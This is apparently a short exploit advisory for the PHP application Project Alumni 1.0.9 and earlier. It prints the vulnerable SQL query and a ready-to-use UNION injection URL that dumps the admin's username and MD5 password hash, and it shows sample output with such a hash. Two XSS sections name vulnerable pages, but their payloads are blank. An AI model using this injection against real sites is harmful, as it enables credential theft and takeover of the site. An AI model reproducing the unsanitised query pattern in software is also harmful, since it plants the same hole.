project-alumni sql injection & xss author : tomplixsee tomplixsee@yahoo.co.id -------------------------------------------------------------------------- affected software version : project alumni 1.0.9, 1.0.8, or lower?? download : https://sourceforge.net/projects/project-alumni/ vulnerability ============= 1.sql injection ++++++++++++++++ vulnerable code on view.page.inc.php: $result = dbQuery("SELECT * FROM `".getConfigVal("sqlTablePrefix",2)."_users` WHERE `alumniYear` = '".$_GET['year']."'"); exploit: http://victim/path/index.php?act=view&year=2003' union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1,1,1,1,1 from alumni_users where ID='1 result example: ________________________________________________________________________________ |Name |Email | |--------------------------------------------------------------------------------| | tomplixsee (1) f25a2fc72690b780b2a14e140ef6a9e0 |Not Available | |--------------------------------------------------------------------------------| tomplixsee is admin's username and f25a2fc72690b780b2a14e140ef6a9e0 is md5 encrypt from admin's password. 2.xss ++++++ vulnerable code: _____________________________________________________________________________________ #/xml/index.php # # # ..... # # ..... # #exploit: #http://victim/path/xml/index.php?year= #_____________________________________________________________________________________ #/index.php # # # .... # # .... # #

Alumni for the Graduating Year of

# #exploit #http://victim/path/index.php?act=view&year= #______________________________________________________________________________________ thanks to: anak-anak jaringan sukabirus, all my friends at stt telkom, jasakom community, sibalbal, crutz_ao, bidulux, akillers 179...........